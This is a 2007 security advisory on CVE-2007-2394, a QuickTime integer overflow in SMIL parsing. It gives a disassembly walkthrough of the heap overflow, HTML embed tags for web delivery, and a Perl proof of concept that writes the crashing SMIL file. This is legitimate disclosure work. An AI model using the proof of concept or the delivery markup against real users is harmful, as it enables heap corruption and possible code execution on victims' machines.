<span style="font-family: courier new,monospace;">======================================================================</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
Apple QuickTime integer overflow vulnerability when parsing SMIL file</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">======================================================================
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">Date: 09/03/2007</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">Author: David Vaartjes <d.vaartjes at <a href="http://gmail.com">gmail.com</a>></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
Identifier: CVE-2007-2394</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">Revision: 0.2</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
AFFECTED VERSIONS</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">Researched on QuickTime 7.1.3 running on Windows 2000 SP4.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">iDefense confirmed the existence of this vulnerability in version</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">7.1.3
and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">binaries for Windows XP and Vista are identical, this issue will
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">affect QuickTime running on Windows Vista also.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
FIXED VERSIONS</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
issue. See [2] for additional information about this update.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">QuickTime
7.2 is not available for the Windows 2000 platform.</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">Presumably, Apple dropped support for this platform.</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">PRODUCT DESCRIPTION</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">QuickTime is Apple's media player product. According to Apple,</span>
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">QuickTime is downloaded over 10 million times a month. According to </span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">Secunia, QuickTime is currently installed on over 50% of PCs [3].</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
The Synchronized MultiMedia Integration Language (SMIL) provides a</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">high-level scripting syntax for describing multimedia presentations.
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">SMIL files are text files that use XML-based syntax to specify what</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">media elements to present and where and when to present them.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">VULNERABILITY DESCRIPTION</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">An integer overflow vulnerability exists in a part of QuickTime.qts <br>that calculates the size of a buffer that stores the title and author<br>fields of a SMIL file. This can be exploited to overflow that heap
<br>buffer with user supplied content, which eventually can result in the<br>execution of arbitrary code.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">VULNERABILITY DETAILS</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">The integer overflow can be triggered by creating a SMIL file</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">containing a title and author field of a specific length.
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
<smil></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"><head></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
<meta name="title" content="specific-length"/></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> <meta name="author" content="specific-length"/>
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"></head></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
</smil></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">When such a SMIL file is parsed the length value of the author field</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
is stored in a short int data type (16 bit) without bounds checking.</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">In sub_66952B50(), this value is (sign) extended to a long int data
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">type (32 bit).</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">66952C9A push eax</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">66952C9B call sub_668B57D0</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C]
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">66952CA5 mov edx, [esp+2Ch+arg_4]</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
66952CA9 lea ecx, [esp+2Ch+var_10]</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">So, when the length of the author field is >= 0x8000 bytes, it will be</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
extended to a length value between 0xffff8000 and 0xffffffff.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">Next, in sub_668DCFD0() the sign extended length of the author field
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">is added to the length of the title field + 0x20:</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD04D jnz short loc_668DD0A0</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">668DD04F test ebx, ebx</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD051 jz loc_668DD1EB
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD057 --> lea eax, [edi+ebx] // edi holds the length of</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> // the title field + 0x20.</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
// ebx holds the sign</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> // extended length of the
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> // author field.</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
668DD05A push eax</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD05B push ecx</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
--</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">In sub_668DCA60(), 4 is added to the result of the calculation:</span>
<br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
668DCB37 test edi, edi</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DCB39 jz short loc_668DCB40</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">668DCB3B --> lea eax, [edi+4] // edi holds the result</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
668DCB3E jmp short loc_668DCB42</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">Next, in sub_668F5550() the final length value is used as the dwBytes</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
argument in a call to HeapRealloc():</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">668F555E push eax // dwBytes (user specified)</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
668F555F push ecx // lpMem</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668F5560 push 1 // dwFlags</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">668F5562 push edx // hHeap</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668F5563 --> call ds:HeapReAlloc
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
This allows for the allocation of a controlled amount of memory. For</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">example, when setting the length of the author field to 0xff00 (65280)
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">and the length of the title field to 0xdf (223), the following</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">situation occurs:</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">1: sub_66952B50():
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">0x0000ff00 will be sign extended to 0xffffff00.</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">2: sub_668DCFD0():</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">resulting in a length value of 0xffffffff.</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> </span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">3: sub_668DCA60():</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> </span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">4: sub_668F5550():</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">HeapRealloc() will allocate 0x00000003 bytes of memory.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0()</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
as the dest argument in a call to memcpy():</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">668DD08E push ebx // count, length value right</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
// after sign extension</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> // (0xffffff00).
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD08F push edx // src, buffer with user</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> // supplied (author) content.</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
668DD090 add eax, esi</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD092 --> push eax // dest, 3 byte buffer.</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">668DD093 call _memcpy</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD098 add esp, 18h</span>
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">668DD09B jmp loc_668DD1E5</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
--</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">This copy action will result in an overflow of the 3 byte heap</span>
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">buffer with data from the author field (user supplied). Due to the</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
large amount of data written, this will finally result in an access</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">violation when memory is read or written outside the heap page. The
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">exception is handled by the program and execution continues with a</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">corrupt heap.</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">For my platform (win2k), when a call to HeapAlloc() is executed the
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">unlink code of ntdll will "fail" because we have overwritten pointers</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">in the heap management structures of other heap buffers with our data.</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
The status of the registers during unlinking is:</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">EAX 78787878 <-- user supplied</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">ECX 78787878 <-- user supplied
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">EBX 00000078</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">ESP 0012EDC8</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">EBP 0012EF84</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">ESI 01200000</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
77f867e6 mov dword ptr ds:[ecx],eax</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">77f867e8 mov dword ptr ds:[eax+4],ecx</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">--</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">The unlink instructions will result in the following exception:
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">---------------------------</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">QuickTimePlayerMain: QuickTimePlayer.exe</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
"The instruction at "0x77f867e6" referenced memory at "0x78787878".</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">The memory could not be "written"
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">---------------------------</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">This shows that we are able to overwrite 4 bytes anywhere in the</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">address space of the process with "any" 4 byte value we want, which
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">can for example be exploited to overwrite function pointers like the</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">SEH or UEF to gain control of the process. This 4 byte overwrite via</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking"</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">is used on these platforms.</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">ATTACK VECTORS</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">This vulnerability can be triggered by luring a target user into</span>
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">running a malicious SMIL file locally or via a webpage. In the later</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
<OBJECT</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> CODEBASE="<a href="http://www.apple.com/qtactivex/qtplugin.cab">http://www.apple.com/qtactivex/qtplugin.cab</a>"</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> WIDTH="10" HEIGHT="10" ></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> <!-- malicious SMIL file -->
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> <PARAM NAME="src" VALUE="poc.smil" /></span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> <EMBED</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> <!-- available .qtif or .mov file to start up QT for FF -->
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> SRC="available-sample.qtif"</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
<!-- malicious SMIL file --></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> QTSRC="poc.smil"</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> WIDTH="10" HEIGHT="10"</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> PLUGINSPAGE="
<a href="http://www.apple.com/quicktime/download">www.apple.com/quicktime/download</a>"</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> TYPE="video/quicktime"
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> /></span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"></OBJECT>
</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">PROOF OF CONCEPT</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
#!/usr/bin/perl -w</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">#### </span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"># QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
#</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"># Researched on QuickTime 7.1.3 on Windows 2000 SP4.</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
#</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"># David Vaartjes <d.vaartjes at <a href="http://gmail.com">gmail.com</a>></span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">####</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">$file = "
poc.smil";</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">$padd = "x";</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
$cop_len = 36;</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">####</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"># By choosing the following lengths the</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"># integer overflow will be triggered.
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">####</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
$tit_len = 223;</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">$auth_len = 65280;</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">open(FH,">$file") or die "Can't open file:$!";</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">print FH</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> "<smil>\n".</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> "<head>\n".</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> " <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> " <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".</span>
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> " <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> "</head>\n".</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;"> "</smil>";</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">close(FH);</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">REFERENCES</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">[1] <a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php">http://labs.idefense.com/intelligence/vulnerabilities/display.php</a>?</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">id=556 </span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">[2] <a href="http://docs.info.apple.com/article.html?artnum=305947">
http://docs.info.apple.com/article.html?artnum=305947</a> </span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">[3] <a href="http://secunia.com/blog/7/">http://secunia.com/blog/7/
</a></span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">----------------------------------------------------------------------
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">DISCLOSURE TIMELINE</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
----------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">
04/02/2007 Initial vendor notification (by iDefense)</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">04/09/2007 Initial vendor response</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">07/11/2007 Apple security bulletin & patches available</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">07/11/2007 Public disclosure of iDefense advisory
</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">09/03/2007 Public disclosure of this advisory</span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">